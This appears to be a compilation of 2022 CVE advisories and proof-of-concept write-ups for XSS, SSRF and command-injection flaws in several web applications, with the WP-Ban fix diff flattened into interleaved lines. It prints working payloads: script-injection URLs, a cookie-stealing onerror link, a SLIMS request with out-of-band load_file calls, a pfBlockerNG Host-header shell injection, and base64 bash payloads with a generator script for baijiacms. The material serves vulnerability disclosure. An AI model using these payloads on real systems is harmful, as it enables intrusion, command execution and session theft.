A Cross site scripting (XSS) vulnerability in Sourcecodester Online Covid-19 Directory on Vaccination System v1.0 allows attackers to execute arbitrary code via the txtfullname parameter or txtphone parameter to register.php without logging in.

**Vulnerability Description**

Cross site scripting (XSS) vulnerability in Sourcecodester Online Covid-19 Directory on Vaccination System v1.0 by Walterjnr1, **allows attackers to execute arbitrary code via the txtfullname parameter or txtphone parameter to register.php without logging in**.

**payload："><script>alert(1)</script>****POC:**

We found that the source program did not check the txtfullname parameter and txtphone parameterfor echo at this location, and there was a Cross-Site Scripting (XSS) vulnerability.

We execute payload on the /covid-19-vaccination/register.php page.

We can see that the system successfully executes the <script>alert(1)</script> command of the attacker.

**Proof:**

XSS attacks by using the **txtfullname** parameter:

XSS attacks by using the **txtphone** parameter:

CVE-2022-46096: z-vulnerabilitys/covid-19-vaccination2.md at main · Frank-Z7/z-vulnerabilitys

A vulnerability, which was classified as problematic, was found in WP-Ban. Affected is an unknown function of the file ban-options.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 22b925449c84faa9b7496abe4f8f5661cb5eb3bf. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216480.

@@ -9,6 +9,15 @@ $base\_page = 'admin.php?page='.$base\_name; $admin\_login = trim($current\_user\->user\_login);  
\# Allow HTML $allowed\_tags = wp\_kses\_allowed\_html( 'post' ); $allowed\_tags\['html'\] = true; $allowed\_tags\['head'\] = true; $allowed\_tags\['meta'\] = array( 'charset' => true, ); $allowed\_tags\['body'\] = true;  
\### Form Processing // Update Options if( ! empty( $\_POST\['Submit'\] ) ) { @@ -24,101 +33,101 @@ $banned\_referers\_post = ! empty( $\_POST\['banned\_referers'\] ) ? explode( "\\n", trim($\_POST\['banned\_referers'\] ) ) : array(); $banned\_user\_agents\_post = ! empty( $\_POST\['banned\_user\_agents'\] ) ? explode( "\\n", trim($\_POST\['banned\_user\_agents'\] ) ) : array(); $banned\_exclude\_ips\_post = ! empty( $\_POST\['banned\_exclude\_ips'\] ) ? explode( "\\n", trim( $\_POST\['banned\_exclude\_ips'\] ) ) : array(); $banned\_message = ! empty( $\_POST\['banned\_template\_message'\] ) ? trim( $\_POST\['banned\_template\_message'\] ) : ''; $banned\_message = ! empty( $\_POST\['banned\_template\_message'\] ) ? wp\_kses( trim( $\_POST\['banned\_template\_message'\] ), $allowed\_tags ) : '';  
$banned\_ips = array(); if(!empty($banned\_ips\_post)) { foreach($banned\_ips\_post as $banned\_ip) { if($admin\_login == 'admin' && ($banned\_ip == ban\_get\_ip() || is\_admin\_ip($banned\_ip))) { $text .= '<p style="color: blue;">'.sprintf(\_\_('This IP \\'%s\\' Belongs To The Admin And Will Not Be Added To Ban List', 'wp-ban'),$banned\_ip).'</p>'; if ( ! empty( $banned\_ips\_post ) ) { foreach ( $banned\_ips\_post as $banned\_ip ) { if( $admin\_login ==\= 'admin' && ( $banned\_ip ==\= ban\_get\_ip() || is\_admin\_ip( $banned\_ip ) ) ) { $text .= '<p style="color: blue;">' . sprintf( \_\_( 'This IP \\'%s\\' Belongs To The Admin And Will Not Be Added To Ban List', 'wp-ban' ), $banned\_ip ) . '</p>'; } else { $banned\_ips\[\] = trim($banned\_ip); $banned\_ips\[\] = esc\_html( trim( $banned\_ip ) ); } } }  
$banned\_ips\_range = array(); if( ! empty( $banned\_ips\_range\_post ) ) { if ( ! empty( $banned\_ips\_range\_post ) ) { foreach( $banned\_ips\_range\_post as $banned\_ip\_range ) { $range = explode( '-', $banned\_ip\_range ); if( sizeof( $range ) === 2 ) { if ( sizeof( $range ) === 2 ) { $range\_start = trim( $range\[0\] ); $range\_end = trim( $range\[1\] ); if( $admin\_login === 'admin' && ( check\_ip\_within\_range( ban\_get\_ip(), $range\_start, $range\_end ) ) ) { $text .= '<p style="color: blue;">'.sprintf( \_\_( 'The Admin\\'s IP \\'%s\\' Fall Within This Range (%s - %s) And Will Not Be Added To Ban List', 'wp-ban' ), ban\_get\_ip(), $range\_start, $range\_end ).'</p>'; if ( $admin\_login === 'admin' && ( check\_ip\_within\_range( ban\_get\_ip(), $range\_start, $range\_end ) ) ) { $text .= '<p style="color: blue;">' . sprintf( \_\_( 'The Admin\\'s IP \\'%s\\' Fall Within This Range (%s - %s) And Will Not Be Added To Ban List', 'wp-ban' ), ban\_get\_ip(), $range\_start, $range\_end ) . '</p>'; } else { $banned\_ips\_range\[\] = trim( $banned\_ip\_range ); $banned\_ips\_range\[\] = esc\_html( trim( $banned\_ip\_range ) ); } } } }  
$banned\_hosts = array(); if(!empty($banned\_hosts\_post)) { foreach($banned\_hosts\_post as $banned\_host) { if($admin\_login == 'admin' && ($banned\_host == @gethostbyaddr(ban\_get\_ip()) || is\_admin\_hostname($banned\_host))) { $text .= '<p style="color: blue;">'.sprintf(\_\_('This Hostname \\'%s\\' Belongs To The Admin And Will Not Be Added To Ban List', 'wp-ban'), $banned\_host).'</p>'; if ( ! empty( $banned\_hosts\_post ) ) { foreach ( $banned\_hosts\_post as $banned\_host ) { if ( $admin\_login ==\= 'admin' && ( $banned\_host ==\= @gethostbyaddr( ban\_get\_ip() ) || is\_admin\_hostname( $banned\_host ) ) ) { $text .= '<p style="color: blue;">' . sprintf( \_\_( 'This Hostname \\'%s\\' Belongs To The Admin And Will Not Be Added To Ban List', 'wp-ban' ), $banned\_host ) . '</p>'; } else { $banned\_hosts\[\] = trim($banned\_host); $banned\_hosts\[\] = esc\_html( trim( $banned\_host ) ); } } }  
$banned\_referers = array(); if(!empty($banned\_referers\_post)) { foreach($banned\_referers\_post as $banned\_referer) { if(is\_admin\_referer($banned\_referer)) { $text .= '<p style="color: blue;">'.sprintf(\_\_('This Referer \\'%s\\' Belongs To This Site And Will Not Be Added To Ban List', 'wp-ban'), $banned\_referer).'</p>'; if ( ! empty( $banned\_referers\_post ) ) { foreach ( $banned\_referers\_post as $banned\_referer ) { if ( is\_admin\_referer( $banned\_referer ) ) { $text .= '<p style="color: blue;">' . sprintf( \_\_( 'This Referer \\'%s\\' Belongs To This Site And Will Not Be Added To Ban List', 'wp-ban' ), $banned\_referer ) . '</p>'; } else { $banned\_referers\[\] = trim($banned\_referer); $banned\_referers\[\] = esc\_html( trim( $banned\_referer ) ); } } }  
$banned\_user\_agents = array(); if(!empty($banned\_user\_agents\_post)) { foreach($banned\_user\_agents\_post as $banned\_user\_agent) { if(is\_admin\_user\_agent($banned\_user\_agent)) { $text .= '<p style="color: blue;">'.sprintf(\_\_('This User Agent \\'%s\\' Is Used By The Current Admin And Will Not Be Added To Ban List', 'wp-ban'), $banned\_user\_agent).'</p>'; if ( ! empty( $banned\_user\_agents\_post ) ) { foreach ( $banned\_user\_agents\_post as $banned\_user\_agent ) { if ( is\_admin\_user\_agent( $banned\_user\_agent ) ) { $text .= '<p style="color: blue;">' . sprintf( \_\_( 'This User Agent \\'%s\\' Is Used By The Current Admin And Will Not Be Added To Ban List', 'wp-ban' ), $banned\_user\_agent ) . '</p>'; } else { $banned\_user\_agents\[\] = trim($banned\_user\_agent); $banned\_user\_agents\[\] = esc\_html( trim( $banned\_user\_agent ) ); } } }  
$banned\_exclude\_ips = array(); if(!empty($banned\_exclude\_ips\_post)) { foreach($banned\_exclude\_ips\_post as $banned\_exclude\_ip) { $banned\_exclude\_ips\[\] = trim($banned\_exclude\_ip); if ( ! empty( $banned\_exclude\_ips\_post ) ) { foreach ( $banned\_exclude\_ips\_post as $banned\_exclude\_ip ) { $banned\_exclude\_ips\[\] = esc\_html( trim( $banned\_exclude\_ip ) ); } } $update\_ban\_queries = array(); $update\_ban\_queries\[\] = update\_option( 'banned\_options', $banned\_options ); $update\_ban\_queries\[\] = update\_option('banned\_ips', $banned\_ips); $update\_ban\_queries\[\] = update\_option('banned\_ips\_range', $banned\_ips\_range); $update\_ban\_queries\[\] = update\_option('banned\_hosts', $banned\_hosts); $update\_ban\_queries\[\] = update\_option('banned\_referers', $banned\_referers); $update\_ban\_queries\[\] = update\_option('banned\_user\_agents', $banned\_user\_agents); $update\_ban\_queries\[\] = update\_option('banned\_exclude\_ips', $banned\_exclude\_ips); $update\_ban\_queries\[\] = update\_option('banned\_message', $banned\_message); $update\_ban\_queries\[\] = update\_option( 'banned\_ips', $banned\_ips ); $update\_ban\_queries\[\] = update\_option( 'banned\_ips\_range', $banned\_ips\_range ); $update\_ban\_queries\[\] = update\_option( 'banned\_hosts', $banned\_hosts ); $update\_ban\_queries\[\] = update\_option( 'banned\_referers', $banned\_referers ); $update\_ban\_queries\[\] = update\_option( 'banned\_user\_agents', $banned\_user\_agents ); $update\_ban\_queries\[\] = update\_option( 'banned\_exclude\_ips', $banned\_exclude\_ips ); $update\_ban\_queries\[\] = update\_option( 'banned\_message', $banned\_message ); $update\_ban\_text = array(); $update\_ban\_text\[\] = \_\_( 'Banned Options', 'wp-ban' ); $update\_ban\_text\[\] = \_\_('Banned IPs', 'wp-ban'); $update\_ban\_text\[\] = \_\_('Banned IP Range', 'wp-ban'); $update\_ban\_text\[\] = \_\_('Banned Host Names', 'wp-ban'); $update\_ban\_text\[\] = \_\_('Banned Referers', 'wp-ban'); $update\_ban\_text\[\] = \_\_('Banned User Agents', 'wp-ban'); $update\_ban\_text\[\] = \_\_('Banned Excluded IPs', 'wp-ban'); $update\_ban\_text\[\] = \_\_('Banned Message', 'wp-ban'); $i\=0; foreach($update\_ban\_queries as $update\_ban\_query) { if($update\_ban\_query) { $text .= '<p style="color: green;">'.$update\_ban\_text\[$i\].' '.\_\_('Updated', 'wp-ban').'</p>'; $update\_ban\_text\[\] = \_\_( 'Banned IPs', 'wp-ban'); $update\_ban\_text\[\] = \_\_( 'Banned IP Range', 'wp-ban'); $update\_ban\_text\[\] = \_\_( 'Banned Host Names', 'wp-ban'); $update\_ban\_text\[\] = \_\_( 'Banned Referers', 'wp-ban'); $update\_ban\_text\[\] = \_\_( 'Banned User Agents', 'wp-ban'); $update\_ban\_text\[\] = \_\_( 'Banned Excluded IPs', 'wp-ban'); $update\_ban\_text\[\] = \_\_( 'Banned Message', 'wp-ban'); $i = 0; foreach ( $update\_ban\_queries as $update\_ban\_query ) { if ( $update\_ban\_query ) { $text .= '<p style="color: green;">' . $update\_ban\_text\[$i\] . ' ' . \_\_( 'Updated', 'wp-ban' ) . '</p>'; } $i++; } if(empty($text)) { $text = '<p style="color: red;">'.\_\_('No Ban Option Updated', 'wp-ban').'</p>'; if ( empty( $text ) ) { $text = '<p style="color: red;">' . \_\_( 'No Ban Option Updated', 'wp-ban' ) . '</p>'; } } if( ! empty( $\_POST\['do'\] ) ) { @@ -202,7 +211,7 @@ function banned\_default\_templates(template) { var default\_template; switch(template) { case "message": default\_template \= "<!DOCTYPE html>\\n<html>\\n<head>\\n<meta charset=\\"utf-8\\">\\n<title>%SITE\_NAME% - %SITE\_URL%</title>\\n</head>\\n<body>\\n<div id=\\"wp-ban-container\\">\\n<p style=\\"text-align: center; font-weight: bold;\\"><?php \_e('You Are Banned.', 'wp-ban'); ?></p>\\n</div>\\n</body>\\n</html>"; default\_template \= "<html>\\n<head>\\n<meta charset=\\"utf-8\\">\\n<title>%SITE\_NAME% - %SITE\_URL%</title>\\n</head>\\n<body>\\n<div id=\\"wp-ban-container\\">\\n<p style=\\"text-align: center; font-weight: bold;\\"><?php \_e('You Are Banned.', 'wp-ban'); ?></p>\\n</div>\\n</body>\\n</html>"; break; } jQuery("#banned\_template\_" + template).val(default\_template); @@ -276,7 +285,7 @@ function toggle\_checkbox() { <td\><strong\><?php echo get\_option('home'); ?></strong\></td\> </tr\> <tr\> <td valign\="top" colspan\="2" align\="center"\> <td valign\="top" colspan\="2" style\="text-align: center;"\> <?php \_e('Please <strong>DO NOT</strong> ban yourself.', 'wp-ban'); ?> </td\> </tr\>

CVE-2022-4631: Fixed XSS · lesterchan/wp-ban@22b9254

A cross-site scripting (XSS) vulnerability in NdkAdvancedCustomizationFields v3.5.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payloads injected into the "htmlNodes" parameter.

Permalink

\# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 Reflected cross site scripting (xss)

\# Date: 01-11-2022

\# Exploit Author: dalii

\# Vendor Homepage: https://www.ndk-design.fr/

\# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english

\# Version: 3.5.0

\# Tested on: Windows 10

\# CVE: CVE-2022-40841

Parameters: htmlNodes

Exploit:

http://localhost/modules/ndk\_advanced\_custom\_fields/showPreview.php?htmlNodes=<script>alert('xss')</script>

CVE-2022-40841: cve-s/poc.txt at main · daaaalllii/cve-s

Senayan Library Management System version 9.2.2 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.21.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit a verydangerous web page or malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)## Proof and Exploit:[href](https://streamable.com/mnpw30)## Time spent`00:05:00`

Senayan Library Management System 9.2.2 Cross Site Scripting

Wildix WMS 6 before 6.02.20221216, WMS 5 before 5.04.20221214, and WMS4 before 4.04.45396.23 allows Server-side request forgery (SSRF) via ZohoClient.php.

•

Wildix Compatible Headsets - Jabra, Plantronics, EPOS Sennheiser, JPL, Axtel, Orosound

CVE-2022-47635: Changelogs - Documentation - Confluence

pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814.

**pfBlockerNg-CVE-2022-40624****Background**

pfBlockerNG is the Next Generation of pfBlocker with the following features:

1.  Manage IPv4/v6 List Sources into 'Deny, Permit or Match' formats.
2.  GeoIP database by MaxMind Inc. (GeoLite2 Free version).
3.  De-Duplication, Suppression, and Reputation enhancements.
4.  Provision to download from diverse List formats.
5.  Advanced Integration for Proofpoint ET IQRisk IP Reputation Threat Sources.
6.  Domain Name (DNSBL) blocking via Unbound DNS Resolver.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

**Affected Versions**

pfBlockerNg <2.1.4\_27

**Vulnerability**

Unauthenticated remote code execution (RCE)

The query for TLD Block section of index.php includes an unsanitized/unescaped user input d_query from the HEADER Host source into the PHP exec function sink.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

_/pfblockerng/www/index.php_

    // Query for a TLD Block
    if (empty($pfb_query)) {
    	$idparts	= explode('.', $query);
    	$idcnt		= (count($idparts) -1);
    
    	for ($i=1; $i <= $idcnt; $i++) {
    		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
    		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);
    
    		if (!empty($match[0])) {
    			$pfb_query = 'DNSBL_TLD';
    			break;
    		}
    	}
    }
    

**Exploitation**

Requires HTTP access to pfsense web console Sample payload: ' *; sleep 5; '

POC Request:

    GET /pfblockerng/www/index.php HTTP/1.1
    Host: test.test2' *; sleep 5; '
    Content-Length: 2
    

**Inspiration**

I love pfBlockerNg and was inspired by Di r00t's recent CVE-2022-31814 and great writeup https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ and was curious to see if Snyk static application security test (SAST) tool would detect the vulnerability. So I download the respecitive index.php version 2.1.4\_26 file and ran Snyk Code against it. Sure enough Snyk detected the vuln plus another similar reporting just a handful of lines later.

CVE-2022-40624: GitHub - dhammon/pfBlockerNg-CVE-2022-40624

A Remote Code Execution (RCE) vulnerability was found in includes/baijiacms/common.inc.php in baijiacms v4.

项目地址：https://github.com/baijiacms/baijiacmsV4  
版本：V4.1.4 20170105 FINAL  
环境：

*   php 5.5.38
*   nginx 1.15
*   mysql 5.7.27
*   20.04.1-Ubuntu

漏洞点在文件includes/baijiacms/common.inc.php  
第654行。

**利用**

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞，需要先登录后台，在附近设置中设置图片压缩比例，否则代码无法运行到此处。

EXP1：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1

EXP2：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1

其中poc可以使用一下代码生成，随后开启web服务确保可以被访问到即可

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  

import base64  
  
cmd = input("cmd>>> ")   
  
b64cmd = base64.b64encode(cmd.encode()).decode()  
  
payload = f"echo {b64cmd}|base64 -d|bash"  
  
print(payload)  
payload = payload.replace(' ','${IFS}')  
print(payload)  
  
name = input("name>>>")  
payload = f"{name}.;{payload};"  
print(payload)  
  
with open(file=webpath+payload,mode='w')as f:  
    f.write('1')  
  
  

**原理**

在该漏洞中，漏洞点为文件includes/baijiacms/common.inc.php  
第654行的system()。该函数位于file\_save()函数中。

1  

system('convert'.$quality\_command.' '.$file\_full\_path.' '.$file\_full\_path);  

其中，$quality\_command无法控制，能够控制的只有$file\_full\_path。

由于上一步调用file\_save()的，是fetch\_net\_file\_upload()函数的return部分

$file\_full\_path的定义往上翻为：

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

$file\_full\_path = WEB\_ROOT .$path . $extpath. $filename;  
  
  
$path = '/attachment/';  
$extpath\="{$extention}/" . date('Y/m/');  
$filename = random(15) . ".{$extention}";  
  
  
$extention = pathinfo($url,PATHINFO\_EXTENSION );  
  

所以能使用的payload只能存在于url后的文件名后缀中，且payload中由于代码功能的限制不能出现，

*   htmlspecialchars()
    
    *   includes/baijiacms.php line92 :$\_GP = irequestsplite($\_GP);
    *   &
    *   “
    *   ’
    *   <
    *   \>
*   后缀 (pathinfo())
    
    *   includes/baijiacms/common.inc.php line 617 :$extention = pathinfo($url,PATHINFO\_EXTENSION );
    *   .
*   file\_get\_contents()
    
    *   includes/baijiacms/common.inc.php line632 :if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
    *   空格
*   文件名
    
    *   web服务器系统类型，在windows下限制颇多
    *   windows
        *   \\
        *   /
        *   :
        *   \*
        *   ?
        *   |
    *   linux
        *   /

**htmlspecialchars()**

在该系统中，所有的参数都会经过includes/baijiacms.php进行htmlspecialchars过滤

所以payload中首先排除了 < > “ ‘ &这些符号

**pathinfo()**

pathinfo()会返回文件路径的信息

1  

$extention = pathinfo($url,PATHINFO\_EXTENSION );  

代码中传入了PATHINFO\_EXTENSION参数，根据官方介绍，传入该参数，只会返回最后一个扩展名，扩展名以 . 划分。结合后面的分析，所以payload只能存在与扩展名中

**file\_get\_contents()**

这一步有两个条件，首先file\_get\_contents()需要可以get到文件，其次文件中需要有内容满足file\_put\_contents()

1  

if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false)   

**$settings\[‘image\_compress\_openscale’\]**

最后在file\_save()中还有一步

1  

if(!empty($settings\['image\_compress\_openscale'\]))  

这一步在略读了代码后才知道，它由函数globaPriveteSystemSetting()获的，取自数据库中。

略读代码后才知道，这个需要在后台中开启图片上传压缩才会在数据库中建立数据。以便后续读取。

所以需要在后台的附件设置中开启并设置图片压缩比例（具体数字随意）

**具体利用过程解析**

EXP:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/\[whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;\](http://42.193.178.194/whoami.%3Becho%24{IFS}d2hvYW1p|base64%24{IFS}-d|bash%3B)&status=1&beid=1

这端url中，主要起作用的是url参数，其他的只是陪跑的（但是也不能删）。url参数原本是远程图片地址。

首先在自己的vps上设置payload，这里我设置的命令为whoami，为了便于区分payload，文件名也取名为whoami。然后使用python开启web服务。

然后登录baijiacms后台，设置一个压缩比例，保存，然后访问

http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.%3Becho%24%7BIFS%7Dd2hvYW1p%7Cbase64%24%7BIFS%7D-d%7Cbash%3B&status=1&beid=1

然后我们来看debug。

代码运行到fetch\_net\_file\_upload函数中，走到$extention = pathinfo($url,PATHINFO\_EXTENSION );时，截取到了payload：;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

随后是mkdir根据时间，后缀，建立文件夹。之后来到if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) 进行判断，这边我为了方便查看file\_get\_contents和file\_put\_contents哪个会出问题，多加了两行代码。

1  
2  

$flag1 = file\_put\_contents($file\_tmp\_name,"1");  
$flag2 = file\_get\_contents($url);  

在这里之后进入file\_save() 。传入了关键的变量

$file\_full\_path：/www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/G55bRGvfRVr00o3.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

这边经过几个判断后，最后到达system()，最终传入的命令为。

convert -quality 100 /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash; /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

由于代码中会根据后缀建立文件夹，所以在system中，payload一共会执行四次，也就是为什么在执行whoami这个payload是，会输出4个www。

**nothing**

1.  在写测试的命令时，如果要用到ping dnslog这类命令，由于linux默认是会一直ping下去的。所以最好加一个-c 4限制次数（系统被搞崩了好多次）
    
2.  php中单引号的字符串和双引号的字符串差距还是挺大的。https://www.cnblogs.com/youxin/archive/2012/02/13/2348551.html。因为这个特性，测试的时候被卡了好久

CVE-2022-45942: baijiacmsV4 后台RCE | This_is_Y

Senayan Library Management System version 9.2.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.2.1/slims9_bulian-9.2.1.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%22%3e%0a%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=o6o88hktpej7qdtu621h58q16q; admin_logged_in=1Connection: closeContent-Length: 2```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1)## Proof and Exploit:[href](https://streamable.com/i20ipf)## Time spent`01:35:00`

Senayan Library Management System 9.2.1 Cross Site Scripting

Silverware Games is a social network where people can play games online. Users can attach URLs to YouTube videos, the site will generate related `<iframe>` when the post will be published. The handler has some sort of protection so non-YouTube links can't be posted, as well as HTML tags are being stripped. However, it was still possible to add custom HTML attributes (e.g. `onclick=alert("xss")`) to the `<iframe>'. This issue was fixed in the version `1.1.34` and does not require any extra actions from our members. There has been no evidence that this vulnerability was used by anyone at this time.

**Package**

post.php (SilverwareGames.io)

**Affected versions**

< 1.1.34

**Description**

Users can attach URLs to YouTube videos, the site will generate related <iframe> when the post will be published. The handler has some sort of protection so non-YouTube links can't be posted, as well as HTML tags are being stripped. However, it was still possible to add custom HTML attributes (e.g. onclick=alert("xss")) to the <iframe>.

It was fixed in the version 1.1.34 and does not require any extra actions from our members. There's no evidence that this vulnerability was used by anyone, too.

CVE-2022-23543: Own HTML attributes when attaching a YouTube link to the post

Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.2.

**Description**

When testing the app for XSS we found out that the fee\_sheet\_ajax.php endpoint is actually vulnerable to an XSS exploit.

**PoC**

1.  visit https://<openemr-instance>/interface/forms/fee\_sheet/review/fee\_sheet\_ajax.php?task=retrieve&mode=encounters&prev\_encounter=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E

**OWASP Category**

A03:2021-Injection

**Remediation**

Add text() to https://github.com/openemr/openemr/blob/master/interface/forms/fee\_sheet/review/fee\_sheet\_ajax.php#L65

**Impact**

The impact of an exploited XSS vulnerability varies a lot. It ranges from Session Hijacking to the disclosure of sensitive data, CSRF attacks and more. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.

**Occurrences**

Tag

#php